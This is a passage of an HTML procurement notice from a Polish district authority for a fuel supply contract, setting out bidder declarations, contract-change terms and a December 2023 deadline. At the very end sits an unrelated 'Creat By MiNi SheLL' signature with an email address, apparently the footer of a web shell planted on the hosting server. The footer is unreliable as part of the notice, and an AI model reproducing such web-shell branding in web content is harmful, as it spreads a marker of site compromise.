zakresie żadnych wymagań, których spełnienie <br/>Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>4) zdolności technicznej lub zawodowej:<br/>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: dysponują lub będą <br/>dysponować: co najmniej jedną stacją paliw położoną w odległości nie dłuższej <br/>niż 10 km od siedziby Zamawiającego - mierzonej najkrótszym możliwym dojazdem <br/>drogą publiczną, zapewniającą możliwość tankowania paliw z dystrybutora przez 7 dni <br/>w tygodniu ( dni powszednie, niedzielę, święta i dni wolne od pracy) w godzinach 07:00 – 22:00 ) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz <br/>spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w <br/>SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz <br/>spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo <br/>zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale II <br/>podrozdziale 9 pkt 2 SWZ.<br/>3. OŚWIADCZENIE WYKONAWCY składane na podstawie art. 1 pkt 3 ustawy z dnia 13 <br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu <br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>4. Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci <br/>elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>5. WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ TAKŻE WRAZ Z OFERTĄ: <br/>1) OŚWIADZCENIE podmiotu udostępniającego zasoby, potwierdzające brak podstaw <br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału <br/>w postępowaniu; ( jeżeli dotyczy)<br/>2) OŚWIADCZENIE wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia z którego wynika, które roboty budowlane lub dostawy lub usługi <br/>wykonają poszczególni wykonawcy ( jeżeli dotyczy)<br/>OŚWIADCZENIE potwierdzające brak podstaw wykluczenia podwykonawcy, <br/>na których zasobach wykonawca nie polega przy wykazywaniu spełnienia warunków <br/>udziału w postępowaniu ( jeżeli dotyczy)<br/>OŚWIADCZENIE podmiotu udostępniającego zasoby składane na podstawie art. 1 pkt <br/>3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie <br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego składane na podstawie art. 125 ust. 5 ustawy Pzp ( jeżeli <br/>dotyczy)<br/>6. DO OFERTY WYKONAWCA ZAŁĄCZA RÓWNIEŻ:<br/>1) ZOBOWIĄZANIE podmiotu udostępniającego zasoby ( jeżeli dotyczy)<br/>2) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa <br/>(jeżeli dotyczy);<br/>3) WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH wykonawca załącza do oferty wykaz rozwiązań <br/>równoważnych z jego opisem lub normami (jeżeli dotyczy)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/>przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) Koncesja wydana przez Urząd Regulacji Energetyki na obrót paliwami ciekłymi zgodniez <br/>wymogami ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne .</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> c) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie<br/>z art. 58 ustawy Pzp. W przypadku Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia publicznego:<br/>• Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika<br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i<br/>zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>• Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie<br/>z pełnomocnikiem.<br/>• jeżeli oferta Wykonawców, o których mowa w pkt c, zostanie wybrana, zamawiający zastrzega<br/>możliwość żądania przed zawarciem umowy w sprawie zamówienia publicznego, przedłożenia<br/>umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający przewiduje możliwości dokonania zmian postanowień zawartej umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie :<br/>1) jeżeli w trakcie realizacji zamówienia nastąpi zmiana ilości pojazdów ( np. zbycie lub nabycie<br/>pojazdów) – zmianie ulegnie załącznik do umowy stanowiący wykaz pojazdów i osób<br/>uprawnionych do zakupu paliwa<br/>2) zmiana wynagrodzenia w przypadku zmiany obowiązującej stawki podatku VAT w sytuacji<br/>gdy w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla dostaw<br/>objętych przedmiotem umowy. W takim przypadku Zamawiający dopuszcza możliwość zmiany<br/>wynagrodzenia o kwotę stanowiącą różnicę w kwocie podatku, jednakże wyłącznie do części<br/>wynagrodzenia za dostawy, których do dnia zmiany stawki podatku VAT jeszcze nie<br/>zrealizowano,<br/>3) określonym w art. 455 ust. 2 ustawy Pzp.<br/>2. Zmiana postanowień umowy następuje w formie pisemnego aneksu pod rygorem<br/>nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-15 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiat_przemysl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-15 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com